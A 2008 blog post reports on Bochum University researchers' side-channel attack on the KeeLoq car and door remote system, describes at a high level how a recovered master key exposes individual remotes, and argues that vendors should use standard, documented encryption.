March 31, 2008
Researchers from the university of Bochum found a way to unlock commonly used RFID anti-theft devices and door openers. The product which they successfully attacked is called KeeLoq, which is used by the car manufactures Chrysler, Daewoo, Fiat, General Motors, Honda, Toyota (Lexus), Volvo, Volkswagen and Jaguar. According to Prof. Christof Paar it is possible to sniff the communication from as far as 100 meters.
A little bit more at the technique used for this attack: The sender and receiver encrypt their communication with a proprietary non-linear encryption algorithm, which encrypts the control commands with an onetime code. A 32bit IV and a 32bit hopping code is used in conjunction with a unique code for every remote control. But there is a problem. There also exists a master key for all keys of a given series. This master key was the attack vector used by they guys from the university of Bochum. They did some side canal analyses to gain knowledge of that key, by doing a differential power analyses (DPA) and a differential electro magnetic analyses (DEMA). After you got the master key you need only to intercept 2 messages to calculate the secrete key of the remote control. According to the researchers they did test the system on commercially available devices. You can read more about it here.
Beside gaining unauthorized access it is also possible to manipulate the system in way that the authorized is not able to access the car/building. Even better!
And again, as I’ve written in my posting â€œA perfect high tech murderâ€, stop reinventing the wheel and stop trying to be smart! They guys in the IT industry learned it already the hard way â€“ use standard and documented encryption! You’re not smarter than the guys doing this for a living and whom survived the internet! One positive aspect: I don’t have a car from one of the above manufactures. 😉